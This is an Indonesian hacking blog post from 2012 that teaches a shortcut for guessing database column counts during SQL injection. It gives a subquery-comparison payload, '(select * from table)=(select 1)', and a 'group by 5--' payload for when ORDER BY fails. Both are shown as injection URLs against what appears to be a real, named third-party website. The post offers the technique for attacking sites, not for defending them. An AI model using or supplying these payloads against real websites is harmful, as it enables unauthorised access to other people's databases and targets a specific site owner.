» » Cara lain dan simple tebak kolom sql injection

Cara lain dan simple tebak kolom sql injection

Diposting oleh Unknown on Jumat, 07 Desember 2012


Kini om-tedjo bakal kasih teknik tentang sql injection yang lebih simple dalam penerawangan tebak kolom dengan sekali query aja. hehe yang sebelumnya teknik sql injection pernah om-tedjo bahas. Lebih lengkapnya lihat disini

Lanjut ke cara simplenya kalau kalian udah paham artikel om-tedjo yang cara manual sql injection...

Cukup gunakan Code:
(select * from table_name) = (select 1)
maka,contohnya seperti di bawah
Code:
http://www.raahauges.com/view-news.php?id=8 and (select * from news)=(select 1)

dan tahukah kalian..ada teknik lain yang bisa di pake kalau.. order by gak berfungsi??
ya sekedar mau share ke kalian dengan menggunakan teknik lain...
yaitu hanya dengan menggunakan GROUP BY
teknik yang sama aja dengan penggunaan order by
Code:
http://www.raahauges.com/view-news.php?id=8 group by 5--

di 14.32
Label:

{ 0 komentar... read them below or add one }


Posting Komentar